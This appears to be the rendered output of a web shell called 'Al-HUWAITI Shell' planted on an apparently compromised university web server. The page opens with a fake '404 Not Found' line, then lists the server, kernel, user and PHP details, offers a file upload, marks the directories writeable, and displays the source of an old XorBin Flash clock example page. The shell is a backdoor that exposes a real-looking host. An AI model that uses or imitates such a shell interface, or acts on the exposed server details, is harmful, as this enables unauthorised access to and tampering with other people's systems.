hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/video.obu.edu/webdt/clock/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //www/docs/video.obu.edu/webdt/clock/digital-clock-example6.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
	<head>
		<title>XorBin Digital Flash Clock. Example 6</title>
		<link rel="stylesheet" type="text/css" href="media/screen.css" />
		<script type="text/javascript" src="js/swfobject.js"></script>
	</head>

	<body>
	
		<h1>Digital flash clock. Example 6<span>(version 1.1)</span></h1>

		<p id="devDigitalClock"><a href="http://www.xorbin.com/">Digital flash clock widget</a></p>
		<script type="text/javascript">
			var flashvars = {
				clockSkin: 'media/skins/skin001.png',
				digitWidth: '20',
				digitHeight: '32',
				separatorWidth: '11',
				ampmWidth: '23',
				ampm: 'no',

				UTCTime: '<?php echo gmdate('H:i:s'); ?>',
				timeOffset: '3600',
				widgetUrl: 'http://www.xorbin.com/'
			};
			swfobject.embedSWF(
				'media/devDigitalClock.swf', // path to the widget
				'devDigitalClock',
				'200', // width of the widget
				'120', // height of the widget
				'8',
				'media/expressInstall.swf',
				flashvars,
				{scale: "noscale", wmode: "transparent"}
			);
		</script>

		<p>This example shows how to use time from server.<br>The clock shows you <a href="http://en.wikipedia.org/wiki/UTC%2B1">UTC+1</a> timezone time.</p>

		<p><a href="" onclick="window.location = 'view-source:' + window.location.href; return false;">View source</a> / <a href="index.html">Back</a></p>

		<p class="copyright">&copy; 2008-2009, <a href="http://www.xorbin.com/" title="Digital flash clock widget">XORBIN.COM</a> website. All rights reserved.</p>

	</body>
</html>

Al-HUWAITI Shell